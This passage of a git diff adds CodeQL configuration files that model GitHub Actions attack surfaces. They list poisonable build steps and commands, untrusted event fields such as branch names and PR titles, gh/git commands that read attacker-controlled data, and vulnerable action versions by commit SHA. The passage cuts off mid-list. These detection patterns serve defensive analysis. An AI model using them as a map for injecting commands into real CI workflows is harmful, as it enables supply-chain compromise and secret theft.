- ["actions/setup-dotnet"] + - ["actions/stale"] + - ["actions/labeler"] + - ["actions/create-github-app-token"] + - ["actions/configure-pages"] + - ["octokit/request-action"] diff --git a/actions/ql/lib/ext/config/poisonable_steps.yml b/actions/ql/lib/ext/config/poisonable_steps.yml new file mode 100644 index 000000000000..3c1aec70a240 --- /dev/null +++ b/actions/ql/lib/ext/config/poisonable_steps.yml @@ -0,0 +1,76 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: poisonableActionsDataModel + # source: https://boostsecurityio.github.io/lotp/ + data: + - ["azure/powershell"] + - ["pre-commit/action"] + - ["oxsecurity/megalinter"] + - ["bridgecrewio/checkov-action"] + - ["ruby/setup-ruby"] + - ["actions/jekyll-build-pages"] + - ["qcastel/github-actions-maven/actions/maven"] + - ["sonarsource/sonarcloud-github-action"] + - addsTo: + pack: codeql/actions-all + extensible: poisonableCommandsDataModel + # source: https://boostsecurityio.github.io/lotp/ + data: + - ["ant"] + - ["asv"] + - ["awk\\s+-f"] + - ["bundle"] + - ["bun"] + - ["cargo"] + - ["checkov"] + - ["eslint"] + - ["gcloud\\s+builds submit"] + - ["golangci-lint"] + - ["gomplate"] + - ["goreleaser"] + - ["gradle"] + - ["java\\s+-jar"] + - ["make"] + - ["mdformat"] + - ["mkdocs"] + - ["msbuild"] + - ["mvn"] + - ["mypy"] + - ["(p)?npm\\s+[a-z]"] + - ["pre-commit"] + - ["prettier"] + - ["phpstan"] + - ["pip\\s+install(.*)\\s+-r"] + - ["pip\\s+install(.*)\\s+--requirement"] + - ["pip(x)?\\s+install(.*)\\s+\\."] + - ["poetry"] + - ["pylint"] + - ["pytest"] + - ["python[\\d\\.]*\\s+-m\\s+pip\\s+install\\s+-r"] + - ["python[\\d\\.]*\\s+-m\\s+pip\\s+install\\s+--requirement"] + - ["rake"] + - ["rails\\s+db:create"] + - ["rails\\s+assets:precompile"] + - ["rubocop"] + - ["sed\\s+-f"] + - ["sonar-scanner"] + - ["stylelint"] + - ["terraform"] + - ["tflint"] + - ["yarn"] + - ["webpack"] + - addsTo: + pack: codeql/actions-all + extensible: poisonableLocalScriptsDataModel + data: + # TODO: It could also be in the form of `dir/cmd` + - ["(\\.\\/[^\\s]+)\\b", 1] # eg: ./venv/bin/activate + - ["(\\.\\s+[^\\s]+)\\b", 1] # eg: . venv/bin/activate + - ["(source|sh|bash|zsh|fish)\\s+([^\\s]+)\\b", 2] + - ["(node)\\s+([^\\s]+)(\\.js|\\.ts)\\b", 2] + - ["(python[\\d\\.]*)\\s+([^\\s]+)\\.py\\b", 2] + - ["(ruby)\\s+([^\\s]+)\\.rb\\b", 2] + - ["(go)\\s+(generate|run)\\s+([^\\s]+)\\.go\\b", 3] + - ["(dotnet)\\s+([^\\s]+)\\.csproj\\b", 2] + diff --git a/actions/ql/lib/ext/config/untrusted_event_properties.yml b/actions/ql/lib/ext/config/untrusted_event_properties.yml new file mode 100644 index 000000000000..cf3d6df80949 --- /dev/null +++ b/actions/ql/lib/ext/config/untrusted_event_properties.yml @@ -0,0 +1,84 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: untrustedEventPropertiesDataModel + data: + # TITLE + - ["github\\.event\\.issue\\.title", "title"] + - ["github\\.event\\.pull_request\\.title", "title"] + - ["github\\.event\\.discussion\\.title", "title"] + - ["github\\.event\\.pages\\[[0-9]+\\]\\.page_name", "title"] + - ["github\\.event\\.pages\\[[0-9]+\\]\\.title", "title"] + - ["github\\.event\\.workflow_run\\.display_title", "title"] + - ["github\\.event\\.changes\\.title\\.from", "title"] + # URL + - ["github\\.event\\.pull_request\\.head\\.repo\\.homepage", "url"] + # TEXT + - ["github\\.event\\.issue\\.body", "text"] + - ["github\\.event\\.pull_request\\.body", "text"] + - ["github\\.event\\.discussion\\.body", "text"] + - ["github\\.event\\.review\\.body", "text"] + - ["github\\.event\\.comment\\.body", "text"] + - ["github\\.event\\.commits\\[[0-9]+\\]\\.message", "text"] + - ["github\\.event\\.head_commit\\.message", "text"] + - ["github\\.event\\.workflow_run\\.head_commit\\.message", "text"] + - ["github\\.event\\.pull_request\\.head\\.repo\\.description", "text"] + - ["github\\.event\\.workflow_run\\.head_repository\\.description", "text"] + - ["github\\.event\\.changes\\.body\\.from", "title"] + # BRANCH + - ["github\\.event\\.pull_request\\.head\\.repo\\.default_branch", "branch"] + - ["github\\.event\\.pull_request\\.head\\.ref", "branch"] + - ["github\\.event\\.workflow_run\\.head_branch", "branch"] + - ["github\\.event\\.workflow_run\\.pull_requests\\[[0-9]+\\]\\.head\\.ref", "branch"] + - ["github\\.event\\.merge_group\\.head_ref", "branch"] + - ["github\\.event\\.changes\\.head\\.ref\\.from", "branch"] + # LABEL + - ["github\\.event\\.pull_request\\.head\\.label", "label"] + # EMAIL + - ["github\\.event\\.head_commit\\.author\\.email", "email"] + - ["github\\.event\\.head_commit\\.committer\\.email", "email"] + - ["github\\.event\\.commits\\[[0-9]+\\]\\.author\\.email", "email"] + - ["github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.email", "email"] + - ["github\\.event\\.merge_group\\.committer\\.email", "email"] + - ["github\\.event\\.workflow_run\\.head_commit\\.author\\.email", "email"] + - ["github\\.event\\.workflow_run\\.head_commit\\.committer\\.email", "email"] + # USERNAME + - ["github\\.event\\.head_commit\\.author\\.name", "username"] + - ["github\\.event\\.head_commit\\.committer\\.name", "username"] + - ["github\\.event\\.commits\\[[0-9]+\\]\\.author\\.name", "username"] + - ["github\\.event\\.commits\\[[0-9]+\\]\\.committer\\.name", "username"] + - ["github\\.event\\.merge_group\\.committer\\.name", "username"] + - ["github\\.event\\.workflow_run\\.head_commit\\.author\\.name", "username"] + - ["github\\.event\\.workflow_run\\.head_commit\\.committer\\.name", "username"] + # PATH + - ["github\\.event\\.workflow\\.path", "path"] + - ["github\\.event\\.workflow_run\\.path", "path"] + - ["github\\.event\\.workflow_run\\.referenced_workflows\\.path", "path"] + # JSON + - ["github", "json"] + - ["github\\.event", "json"] + - ["github\\.event\\.comment", "json"] + - ["github\\.event\\.commits", "json"] + - ["github\\.event\\.discussion", "json"] + - ["github\\.event\\.head_commit", "json"] + - ["github\\.event\\.head_commit\\.author", "json"] + - ["github\\.event\\.head_commit\\.committer", "json"] + - ["github\\.event\\.issue", "json"] + - ["github\\.event\\.merge_group", "json"] + - ["github\\.event\\.merge_group\\.committer", "json"] + - ["github\\.event\\.pull_request", "json"] + - ["github\\.event\\.pull_request\\.head", "json"] + - ["github\\.event\\.pull_request\\.head\\.repo", "json"] + - ["github\\.event\\.pages", "json"] + - ["github\\.event\\.review", "json"] + - ["github\\.event\\.workflow", "json"] + - ["github\\.event\\.workflow_run", "json"] + - ["github\\.event\\.workflow_run\\.head_branch", "json"] + - ["github\\.event\\.workflow_run\\.head_commit", "json"] + - ["github\\.event\\.workflow_run\\.head_commit\\.author", "json"] + - ["github\\.event\\.workflow_run\\.head_commit\\.committer", "json"] + - ["github\\.event\\.workflow_run\\.head_repository", "json"] + - ["github\\.event\\.workflow_run\\.pull_requests", "json"] + - ["github\\.event\\.changes", "json"] + + diff --git a/actions/ql/lib/ext/config/untrusted_gh_command.yml b/actions/ql/lib/ext/config/untrusted_gh_command.yml new file mode 100644 index 000000000000..c81c048e45eb --- /dev/null +++ b/actions/ql/lib/ext/config/untrusted_gh_command.yml @@ -0,0 +1,56 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: untrustedGhCommandDataModel + data: + # + # PULL REQUESTS + # + # HEAD_REF=$(gh pr view "${{ github.event.issue.number }}" --json headRefName -q '.headRefName') + - ["gh\\s+pr\\b.*\\bview\\b.*\\.headRefName.*", "branch,oneline"] + # TITLE=$(gh pr view $PR_NUMBER --json title --jq .title) + - ["gh\\s+pr\\b.*\\bview\\b.*\\.title.*", "title,oneline"] + # BODY=$(gh pr view $PR_NUMBER --json body --jq .body) + - ["gh\\s+pr\\b.*\\bview\\b.*\\.body.*", "text,multiline"] + # COMMENTS="$(gh pr view --repo ${{ github.repository }} "$PR_NUMBER" --json "body,comments" -q '.body, .comments[].body')" + - ["gh\\s+pr\\b.*\\bview\\b.*\\.comments.*", "text,multiline"] + # CHANGED_FILES="$(gh pr view --repo ${{ github.repository }} ${{ needs.check-comment.outputs.pull_number }} --json files --jq '.files.[].path')" + - ["gh\\s+pr\\b.*\\bview\\b.*\\.files.*", "filename,multiline"] + # AUTHOR=$(gh pr view ${ORI_PR} -R ${REPO} --json author -q '.author.login') + - ["gh\\s+pr\\b.*\\bview\\b.*\\.author.*", "username,oneline"] + # + # ISSUES + # + # TITLE=$(gh issue view "$ISSUE_NUMBER" --json title --jq '.title') + - ["gh\\s+issue\\b.*\\bview\\b.*\\.title.*", "title,oneline"] + # BODY=$(gh issue view -R ${GITHUB_REPOSITORY} ${ORIGINAL_ISSUE_NUMBER} --json title,body,assignees --jq .body) + - ["gh\\s+issue\\b.*\\bview\\b.*\\.body.*", "text,multiline"] + # COMMENTS=$(gh issue view "$ISSUE_NUMBER" --json comments --jq '.comments[].body') + - ["gh\\s+issue\\b.*\\bview\\b.*\\.comments.*", "text,multiline"] + # + # API + # + # PR="$(gh api /repos/test/test/pulls/${PR_NUMBER})" + # + # HEAD_REF=$(gh api -H 'Accept: application/vnd.github+json' /repos/test/test/commits/${{ env.sui_sha }}/pulls --jq '.[].head.ref' | head -n 1) + - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*\\b.*\\.head.ref.*", "branch,oneline"] + # TITLE=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".title") + - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*\\b.*\\.title.*", "title,oneline"] + # BODY=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".body") + - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*\\b.*\\.body.*", "text,multiline"] + # COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body') + - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*/comments\\b.*\\.body.*", "text,multiline"] + # CHANGED_FILES=$(gh api /repos/test/test/pulls/${{PR_NUMBER}}/files --jq '.[].filename') + - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*/files\\b.*\\.filename.*", "filename,oneline"] + # AUTHOR=$(gh api /repos/test/test/pulls/${{PR_NUMBER}} --jq ".user.login") + - ["gh\\s+api\\b.*\\b(/)?repos/.*/pulls.*\\b.*\\.user\\.login.*", "username,oneline"] + # + # ISSUES + # + # TITLE=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".title") + - ["gh\\s+api\\b.*\\b(/)?repos/.*/issues.*\\b.*\\.title.*", "title,oneline"] + # BODY=$(gh api /repos/test/test/issues/${{PR_NUMBER}} --jq ".body") + - ["gh\\s+api\\b.*\\b(/)?repos/.*/issues.*\\b.*\\.body.*", "text,multiline"] + # COMMENTS=$(gh api /repos/test/test/pulls/${PR_NUMBER}/comments --jq '.[].body') + - ["gh\\s+api\\b.*\\b(/)?repos/.*/issues.*/comments\\b.*\\.body.*", "text,multiline"] + diff --git a/actions/ql/lib/ext/config/untrusted_git_command.yml b/actions/ql/lib/ext/config/untrusted_git_command.yml new file mode 100644 index 000000000000..05fda3e1cd9f --- /dev/null +++ b/actions/ql/lib/ext/config/untrusted_git_command.yml @@ -0,0 +1,32 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: untrustedGitCommandDataModel + data: + # FILES=$(git diff-tree --no-commit-id --name-only HEAD -r) + - ["git\\b.*\\bdiff-tree\\b", "filename,multiline"] + # CHANGES=$(git --no-pager diff --name-only $NAME | grep -v -f .droneignore); + # CHANGES=$(git diff --name-only) + - ["git\\b.*\\bdiff\\b", "filename,multiline"] + # COMMIT_MESSAGE=$(git log --format=%s -n 1) + - ["git\\b.*\\blog\\b.*%s", "text,online"] + # COMMIT_MESSAGE=$(git log --format=%B -n 1) + - ["git\\b.*\\blog\\b.*%B", "text,multiline"] + # COMMIT_MESSAGE=$(git log --format=oneline) + - ["git\\b.*\\blog\\b.*oneline", "text,oneline"] + # COMMIT_MESSAGE=$(git show -s --format=%B) + # COMMIT_MESSAGE=$(git show -s --format=%s) + - ["git\\b.*\\bshow\\b.*-s.*%s", "text,oneline"] + - ["git\\b.*\\bshow\\b.*-s.*%B", "text,multiline"] + # AUTHOR=$(git log -1 --pretty=format:'%an') + - ["git\\b.*\\blog\\b.*%an", "username,oneline"] + # AUTHOR=$(git show -s --pretty=%an) + - ["git\\b.*\\bshow\\b.*%an", "username,oneline"] + # EMAIL=$(git log -1 --pretty=format:'%ae') + - ["git\\b.*\\blog\\b.*%ae", "email,oneline"] + # EMAIL=$(git show -s --pretty=%ae) + - ["git\\b.*\\bshow\\b.*%ae", "email,oneline"] + # BRANCH=$(git branch --show-current) + - ["git\\b.*\\bbranch\\b.*\\b--show-current\\b", "branch,oneline"] + # BRANCH=$(git rev-parse --abbrev-ref HEAD) + - ["git\\b.*\\brev-parse\\b.*\\b--abbrev-ref\\b", "branch,oneline"] diff --git a/actions/ql/lib/ext/config/vulnerable_actions.yml b/actions/ql/lib/ext/config/vulnerable_actions.yml new file mode 100644 index 000000000000..1fe00ad733bb --- /dev/null +++ b/actions/ql/lib/ext/config/vulnerable_actions.yml @@ -0,0 +1,641 @@ +extensions: + - addsTo: + pack: codeql/actions-all + extensible: vulnerableActionsDataModel + data: + + # gh api /repos/actions/download-artifact/tags --jq 'map({name: .name, sha: .commit.sha})' --paginate | jq -r '.[] | "- \"\(.name)\", \"\(.sha)\""' + + # + # actions/download-artifact + - ["actions/download-artifact", "v4.1.6", "9c19ed7fe5d278cd354c7dfd5d3b88589c7e2395", "4.1.7"] + - ["actions/download-artifact", "v4.1.5", "8caf195ad4b1dee92908e23f56eeb0696f1dd42d", "4.1.7"] + - ["actions/download-artifact", "v4.1.4", "c850b930e6ba138125429b7e5c93fc707a7f8427", "4.1.7"] + - ["actions/download-artifact", "v4.1.3", "87c55149d96e628cc2ef7e6fc2aab372015aec85", "4.1.7"] + - ["actions/download-artifact", "v4.1.2", "eaceaf801fd36c7dee90939fad912460b18a1ffe", "4.1.7"] + - ["actions/download-artifact", "v4.1.1", "6b208ae046db98c579e8a3aa621ab581ff575935", "4.1.7"] + - ["actions/download-artifact", "v4.1.0", "f44cd7b40bfd40b6aa1cc1b9b5b7bf03d3c67110", "4.1.7"] + - ["actions/download-artifact", "v4.0.0", "7a1cd3216ca9260cd8022db641d960b1db4d1be4", "4.1.7"] + - ["actions/download-artifact", "v3.0.2", "9bc31d5ccc31df68ecc42ccf4149144866c47d8a", "4.1.7"] + - ["actions/download-artifact", "v3.0.1", "9782bd6a9848b53b110e712e20e42d89988822b7", "4.1.7"] + - ["actions/download-artifact", "v3.0.0", "fb598a63ae348fa914e94cd0ff38f362e927b741", "4.1.7"] + - ["actions/download-artifact", "v3", "9bc31d5ccc31df68ecc42ccf4149144866c47d8a", "4.1.7"] + - ["actions/download-artifact", "v3-node20", "246d7188e736d3686f6d19628d253ede9697bd55", "4.1.7"] + - ["actions/download-artifact", "v2.1.1", "cbed621e49e4c01b044d60f6c80ea4ed6328b281", "4.1.7"] + - ["actions/download-artifact", "v2.1.0", "f023be2c48cc18debc3bacd34cb396e0295e2869", "4.1.7"] + - ["actions/download-artifact", "v2.0.10", "3be87be14a055c47b01d3bd88f8fe02320a9bb60", "4.1.7"] + - ["actions/download-artifact", "v2.0.9", "158ca71f7c614ae705e79f25522ef4658df18253", "4.1.7"] + - ["actions/download-artifact", "v2.0.8", "4a7a711286f30c025902c28b541c10e147a9b843", "4.1.7"] + - ["actions/download-artifact", "v2.0.7", "f144d3c3916a86f4d6b11ff379d17a49d8f85dbc", "4.1.7"] + - ["actions/download-artifact", "v2.0.6", "f8e41fbffeebb48c0273438d220bb2387727471f", "4.1.7"] + - ["actions/download-artifact", "v2.0.5", "c3f5d00c8784369c43779f3d2611769594a61f7a", "4.1.7"] + - ["actions/download-artifact", "v2.0.4", "b3cedea9bed36890c824f4065163b667eeca272b", "4.1.7"] + - ["actions/download-artifact", "v2.0.3", "80d2d4023c185001eacb50e37afd7dd667ba8044", "4.1.7"] + - ["actions/download-artifact", "v2.0.2", "381af06b4268a1e0ad7b7c7e5a09f1894977120f", "4.1.7"] + - ["actions/download-artifact", "v2.0.1", "1ac47ba4b6af92e65d0438b64ce1ea49ce1cc48d", "4.1.7"] + - ["actions/download-artifact", "v2.0", "1de1dea89c32dcb1f37183c96fe85cfe067b682a", "4.1.7"] + - ["actions/download-artifact", "v2", "cbed621e49e4c01b044d60f6c80ea4ed6328b281", "4.1.7"] + - ["actions/download-artifact", "v1.0.0", "18f0f591fbc635562c815484d73b6e8e3980482e", "4.1.7"] + - ["actions/download-artifact", "v1", "18f0f591fbc635562c815484d73b6e8e3980482e", "4.1.7"] + - ["actions/download-artifact", "1.0.0", "18f0f591fbc635562c815484d73b6e8e3980482e", "4.1.7"] + + # tj-actions/changed-files + # https://github.com/advisories/GHSA-mcph-m25j-8j63 + # CVE-2023-51664 + - ["tj-actions/changed-files", "v40.2.3", "56284d80811fb5963a972b438f2870f175e5b7c8", "41"] + - ["tj-actions/changed-files", "v40.2.2", "94549999469dbfa032becf298d95c87a14c34394", "41"] + - ["tj-actions/changed-files", "v40.2.1", "1c938490c880156b746568a518594309cfb3f66b", "41"] + - ["tj-actions/changed-files", "v40.2.0", "da093c1609db0edd0a037ce9664e135f74bf30d9", "41"] + - ["tj-actions/changed-files", "v40.1.1", "25ef3926d147cd02fc7e931c1ef50772bbb0d25d", "41"] + - ["tj-actions/changed-files", "v40.1.0", "18c8a4ecebe93d32ed8a88e1d0c098f5f68c221b", "41"] + - ["tj-actions/changed-files", "v40.0.2", "40526807ee1e208a1a8c1bbe6bd2d1b044ef6368", "41"] + - ["tj-actions/changed-files", "v40.0.1", "bfc49f4cff6934aa236c171f9bcbf1dd6b1ef438", "41"] + - ["tj-actions/changed-files", "v40.0.0", "af292f1e845a0377b596972698a8598734eb2796", "41"] + - ["tj-actions/changed-files", "v40", "56284d80811fb5963a972b438f2870f175e5b7c8", "41"] + - ["tj-actions/changed-files", "v39.2.4", "fea790cb660e33aef4bdf07304e28fedd77dfa13", "41"] + - ["tj-actions/changed-files", "v39.2.3", "95690f9ece77c1740f4a55b7f1de9023ed6b1f87", "41"] + - ["tj-actions/changed-files", "v39.2.2", "408093d9ff9c134c33b974e0722ce06b9d6e8263", "41"] + - ["tj-actions/changed-files", "v39.2.1", "db153baf731265ad02cd490b07f470e2d55e3345", "41"] + - ["tj-actions/changed-files", "v39.2.0", "8238a4103220c636f2dad328ead8a7c8dbe316a3", "41"] + - ["tj-actions/changed-files", "v39.1.2", "41960309398d165631f08c5df47a11147e14712b", "41"] + - ["tj-actions/changed-files", "v39.1.1", "a21a533a0c244a27daac02f9dc6fcf8aeb996154", "41"] + - ["tj-actions/changed-files", "v39.1.0", "8e79ba7ab9fee9984275219aeb2c8db47bcb8a2d", "41"] + - ["tj-actions/changed-files", "v39.0.3", "76c4d81a6acd339b55bd7407a016981c853eb702", "41"] + - ["tj-actions/changed-files", "v39.0.2", "6ee9cdc5816333acda68e01cf12eedc619e28316", "41"] + - ["tj-actions/changed-files", "v39.0.1", "246636f5fa148b5ad8e65ca4c57b18af3123e5f6", "41"] + - ["tj-actions/changed-files", "v39.0.0", "48566bbcc22ceb7c5809ebdd27377309f2c3de8c", "41"] + - ["tj-actions/changed-files", "v39", "fea790cb660e33aef4bdf07304e28fedd77dfa13", "41"] + - ["tj-actions/changed-files", "v38.2.2", "1aee3621b1c10305ee778298fcf32324684e5448", "41"] + - ["tj-actions/changed-files", "v38.2.1", "2f7246cb26e8bb6709b6cbfc1fec7febfe82e96a", "41"] + - ["tj-actions/changed-files", "v38.2.0", "0fc9663aa70243d87319dbd32fd926344d18d38f", "41"] + - ["tj-actions/changed-files", "v38.1.3", "c860b5c47fa71f461da850094ef2f6e3d6514e44", "41"] + - ["tj-actions/changed-files", "v38.1.2", "2f8b80270f04e421b28efb2abaccef4fce4815b6", "41"] + - ["tj-actions/changed-files", "v38.1.1", "b7f1b7347fea1df67230801b66081fe3cba7dc69", "41"] + - ["tj-actions/changed-files", "v38.1.0", "1c26215f3fbd51eba03bc199e5cbabdfc3584ce3", "41"] + - ["tj-actions/changed-files", "v38.0.0", "17f3fec1edef0c3916d59cbcee1585fcd457e456", "41"] + - ["tj-actions/changed-files", "v38", "1aee3621b1c10305ee778298fcf32324684e5448", "41"] + - ["tj-actions/changed-files", "v37.6.1", "a0585ff9904b77d046192a7846e59783d6ea287b", "41"] + - ["tj-actions/changed-files", "v37.6.0", "87697c0dca7dd44e37a2b79a79489332556ff1f3", "41"] + - ["tj-actions/changed-files", "v37.5.2", "85c8b8252fc9893e00b3633a16670e53040e6d71", "41"] + - ["tj-actions/changed-files", "v37.5.1", "a96679dfee2a1e64b1db5a210c0ffaf1f2cb24ce", "41"] + - ["tj-actions/changed-files", "v37.5.0", "920e7b9ae1d45913fc81f86c956fee89c77d2e5e", "41"] + - ["tj-actions/changed-files", "v37.4.0", "de0eba32790fb9bf87471b32855a30fc8f9d5fc6", "41"] + - ["tj-actions/changed-files", "v37.3.0", "39283171cefdf491e0f0d6cf285b86b31eb6f3cd", "41"] + - ["tj-actions/changed-files", "v37.2.0", "68b429ddc666ea0dba46309e1ee45e06bb408df8", "41"] + - ["tj-actions/changed-files", "v37.1.2", "2a968ff601949c81b47d9c1fdb789b0d25ddeea2", "41"] + - ["tj-actions/changed-files", "v37.1.1", "1f20fb83f05eabed6e12ba0329edac8b6ec8e207", "41"] + - ["tj-actions/changed-files", "v37.1.0", "87e23c4c79a603288642711155953c7da34b11ac", "41"] + - ["tj-actions/changed-files", "v37.0.5", "54849deb963ca9f24185fb5de2965e002d066e6b", "41"] + - ["tj-actions/changed-files", "v37.0.4", "bb3376162b179308a79fc4450262a15a8e1d6888", "41"] + - ["tj-actions/changed-files", "v37.0.3", "ec1e14cf27f4585783f463070881b2c499349a8a", "41"] + - ["tj-actions/changed-files", "v37.0.2", "2106eb4457dd2aba4d37c8cdd16acba5d18739b9", "41"] + - ["tj-actions/changed-files", "v37.0.1", "e5efec47f620e0fde64a1ad8f53bbf53d51a8c97", "41"] + - ["tj-actions/changed-files", "v37.0.0", "5817a9efb0d7cc34b917d8146ea10b9f32044968", "41"] + - ["tj-actions/changed-files", "v37", "a0585ff9904b77d046192a7846e59783d6ea287b", "41"] + - ["tj-actions/changed-files", "v36.4.1", "54479c37f5eb47a43e595c6b71e1df2c112ce7f1", "41"] + - ["tj-actions/changed-files", "v36.4.0", "e1754a427f478b8778d349341b8f1d80f1f47f44", "41"] + - ["tj-actions/changed-files", "v36.3.0", "9bf09145c3560e451e8d8e87b42ccb3fef5b692d", "41"] + - ["tj-actions/changed-files", "v36.2.1", "c9124514c375de5dbb9697afa6f2e36a236ee58c", "41"] + - ["tj-actions/changed-files", "v36.2.0", "174a2a6360b54a2019877c254c4be78106efc94f", "41"] + - ["tj-actions/changed-files", "v36.1.0", "fb20f4d24890fadc539505b1746d260504b213d0", "41"] + - ["tj-actions/changed-files", "v36.0.18", "07e0177b72d3640efced741cae32f9861eee1367", "41"] + - ["tj-actions/changed-files", "v36.0.17", "b13786805affca18e536ed489687d3d8d1f05d21", "41"] + - ["tj-actions/changed-files", "v36.0.16", "1aae16084af435f73c8cdfd742473028810c5f20", "41"] + - ["tj-actions/changed-files", "v36.0.15", "5d2fcdb4cbef720a52f49fd05d8c7edd18a64758", "41"] + - ["tj-actions/changed-files", "v36.0.14", "9ecc6e7fe2e26945b52485ccd9bc4b44000f5af1", "41"] + - ["tj-actions/changed-files", "v36.0.13", "8c9ee56d0180a538ad5b6b8a208e4db974bad9c0", "41"] + - ["tj-actions/changed-files", "v36.0.12", "5978e5a2df95ef20cde627d4acb5edd1f87ba46a", "41"] + - ["tj-actions/changed-files", "v36.0.11", "17c3e9e98f47ef859502ba3e38be0b8a6a4bddd9", "41"] + - ["tj-actions/changed-files", "v36.0.10", "3f7b5c900bdbf1b80a825e220413986227b3ff03", "41"] + - ["tj-actions/changed-files", "v36.0.9", "cf4fe8759a45edd76ed6215da3529d2dbd2a3c68", "41"] + - ["tj-actions/changed-files", "v36.0.8", "043929ee8fffa1dd1d619782a5a338cf39e76e23", "41"] + - ["tj-actions/changed-files", "v36.0.7", "4e2535f2b330e70ff7055f7de4272653cfdbd555", "41"] + - ["tj-actions/changed-files", "v36.0.6", "652648acb4f32660a94e245a2a51c6d0e56b2a1d", "41"] + - ["tj-actions/changed-files", "v36.0.5", "9ad1a5b96ab3e56cd2bb25ff90c6271e4e70eb71", "41"] + - ["tj-actions/changed-files", "v36.0.4", "c798a4ea57f0e0a9d2b5374853c9c479ebb435a2", "41"] + - ["tj-actions/changed-files", "v36.0.3", "25eaddf37ae893cec889065e9a60439c8af6f089", "41"] + - ["tj-actions/changed-files", "v36.0.2", "abef388dd913ce13a650bbf800eba73961657fb9", "41"] + - ["tj-actions/changed-files", "v36.0.1", "1c2673b763ea086acd660dd4257c9be06eb77667", "41"] + - ["tj-actions/changed-files", "v36.0.0", "53c377a374b445ec2a61e343068807bf41f2c9a6", "41"] + - ["tj-actions/changed-files", "v36", "54479c37f5eb47a43e595c6b71e1df2c112ce7f1", "41"] + - ["tj-actions/changed-files", "v35.9.3", "039afcd1024c210363c9d3fc8fd07e1f3fcf2867", "41"] + - ["tj-actions/changed-files", "v35.9.3-sec", "8663bb8fc810b983a35585a2dd6a121c09d2590d", "41"] + - ["tj-actions/changed-files", "v35.9.2", "b2d17f51244a144849c6b37a3a6791b98a51d86f", "41"] + - ["tj-actions/changed-files", "v35.9.2-sec", "4fc4e9d28ecb58e0215483343f3dd2fd01178f42", "41"] + - ["tj-actions/changed-files", "v35.9.1", "4a0aac0d19aa2838c6741fdf95a5276390418dc2", "41"] + - ["tj-actions/changed-files", "v35.9.1-sec", "89daa3bca3cd1f2967097668c0e8b5f7dda4d57f", "41"] + - ["tj-actions/changed-files", "v35.9.0", "ce810b29b28abf274afebdcd8fe47b8fba0f28bd", "41"] + - ["tj-actions/changed-files", "v35.9.0-sec", "2e61fb6a48f5857e3a338b4cbf071e1164c060e9", "41"] + - ["tj-actions/changed-files", "v35.8.0", "7ecfc6730dff8072d1cc5215a24cc9478f55264d", "41"] + - ["tj-actions/changed-files", "v35.8.0-sec", "21d7a75834ad73fed7fa33b39b73ebe6495ee4e1", "41"] + - ["tj-actions/changed-files", "v35.7.12", "b109d83a62e94cf7c522bf6c15cb25c175850b16", "41"] + - ["tj-actions/changed-files", "v35.7.12-sec", "2be7c3758f3e6e45ae5d27c133a3260c5b0fdd60", "41"] + - ["tj-actions/changed-files", "v35.7.11", "79adacd43ea069e57037edc891ea8d33013bc3da", "41"] + - ["tj-actions/changed-files", "v35.7.11-sec", "123dfd48407ae53e33a73e2ae9adf9d8ad8b14d6", "41"] + - ["tj-actions/changed-files", "v35.7.10", "6e426e6495fa7ea3451f37ce3f1dac2a3f16f62c", "41"] + - ["tj-actions/changed-files", "v35.7.10-sec", "61bf27253df806648581aaddd4a8ec394b968c80", "41"] + - ["tj-actions/changed-files", "v35.7.9", "5e2d64b30d51d557c5a29309ecbd5481a236ec77", "41"] + - ["tj-actions/changed-files", "v35.7.9-sec", "b94d96993dacb3158c51d22c3afae1f4059a71d2", "41"] + - ["tj-actions/changed-files", "v35.7.8", "e9b5807e928fc8eea705c90da5524fd44b183ba1", "41"] + - ["tj-actions/changed-files", "v35.7.8-sec", "22bed7e94fbb176468579214290dfd84abc6ea86", "41"] + - ["tj-actions/changed-files", "v35.7.7", "db5dd7c176cf59a19ef6561bf1936f059dee4b74", "41"] + - ["tj-actions/changed-files", "v35.7.7-sec", "7795905b24e743c8c33cd5ba5cd256cc92c81f68", "41"] + - ["tj-actions/changed-files", "v35.7.6", "07f86bcdc42639264ec561c7f175fea5f532b6ce", "41"] + - ["tj-actions/changed-files", "v35.7.6-sec", "08d9eb809753cbbaf6c8256285605312ce3987b9", "41"] + - ["tj-actions/changed-files", "v35.7.5", "3a3ec498d8976e74f5dd829c413c1d446e738df7", "41"] + - ["tj-actions/changed-files", "v35.7.4", "ee137444f0b3b0855cb2fc7df807416ba2c3d311", "41"] + - ["tj-actions/changed-files", "v35.7.3", "cda290230383045a8887a250c2abf796bf1dc6da", "41"] + - ["tj-actions/changed-files", "v35.7.2", "9328bab880abf4acc377d77718d28c6ac167f154", "41"] + - ["tj-actions/changed-files", "v35.7.1", "4e680e146a8e1b530a912f0a1fdc2f0ace7d1bb7", "41"] + - ["tj-actions/changed-files", "v35.7.1-sec", "7e64030c44ffb4a2e8199e7e105943eb108db836", "41"] + - ["tj-actions/changed-files", "v35.7.0", "bd376fbcfae914347656e4c70801e2a3fafed05b", "41"] + - ["tj-actions/changed-files", "v35.7.0-sec", "1d1543af8cef13eb42c756e9425e2cc50e8030b0", "41"] + - ["tj-actions/changed-files", "v35.6.4", "84ed30e2f4daf616144de7e0c1db59d5b33025e3", "41"] + - ["tj-actions/changed-files", "v35.6.3", "74b06cafc9658d2a91cc5ceb920fd6b5a5649051", "41"] + - ["tj-actions/changed-files", "v35.6.2", "5ce975c6021a0b11062c547acb6c26c96a34a8c5", "41"] + - ["tj-actions/changed-files", "v35.6.1", "04124efe7560d15e11ea2ba96c0df2989f68f1f4", "41"] + - ["tj-actions/changed-files", "v35.6.0", "3ee6abf6107ccc2d8ee538de7ff6b1fb644f5d60", "41"] + - ["tj-actions/changed-files", "v35.5.6", "23e3c4300cb904a9d9c36fc2df4111a2fa9b9ff1", "41"] + - ["tj-actions/changed-files", "v35.5.5", "5a331a4999f9f21a3ef2a6459edee90393a8b92a", 